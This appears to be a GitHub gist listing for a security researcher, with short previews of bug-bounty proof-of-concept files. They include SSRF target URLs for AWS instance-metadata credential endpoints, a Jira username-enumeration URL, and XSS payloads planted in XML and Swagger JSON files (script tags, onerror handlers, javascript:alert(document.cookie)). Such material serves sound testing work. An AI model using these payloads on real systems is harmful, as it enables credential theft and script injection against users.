xlocux
/ cloud_metadata.txt
Created
September 21, 2022 10:52
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
xlocux
/ Jira bug-exploit
Created
December 14, 2020 11:59
— forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |
xlocux
/ regions.xml
Created
September 9, 2019 10:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="windows-1252"?> | |
| <regions mapColor="0xDDDDDD" inertColor="0x333333"> | |
| <america name="Americas" activeColor="0x45c4ef" link="http://bio.locu.uk"> | |
| <language name="North America - English" link="http://bio.locu.uk"/> | |
| <language name="Amérique du Nord - Français" link="http://bio.locu.uk"/> | |
| <language name="América del Norte - Español" link="http://bio.locu.uk"/> | |
| <language name=" -------" link=""/> | |
| <language name="Latinoamérica - Español" link="javascript:alert(1)"/> | |
| <language name="Latin America - English" link="alert(1)"/> | |
| </america> |
xlocux
/ GITHUB_TOKEN checker
Created
August 19, 2019 21:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requirement: pip install PyGithub | |
| from github import Github | |
| token = 'your_github_token' | |
| g = Github(token) | |
| user = g.get_user() |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
xlocux
/ swagger-xss3.json
Last active
August 19, 2019 21:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "version": "0.0.1", | |
| "title": "Example Title", | |
| "description": "<img src=x onerror=\"alert(document.domain)\">", | |
| "termsOfService": "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" | |
| }, | |
| "paths": { | |
| "/": { |
xlocux
/ swagger.json
Last active
August 10, 2019 11:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "version": "1.0.0", | |
| "title": "XSS POC by Locu", | |
| "description": "<script>alert(document.domain)</script>", | |
| "termsOfService": "javascript:alert(document.cookie)" | |
| }, | |
| "paths": { | |
| "/": { |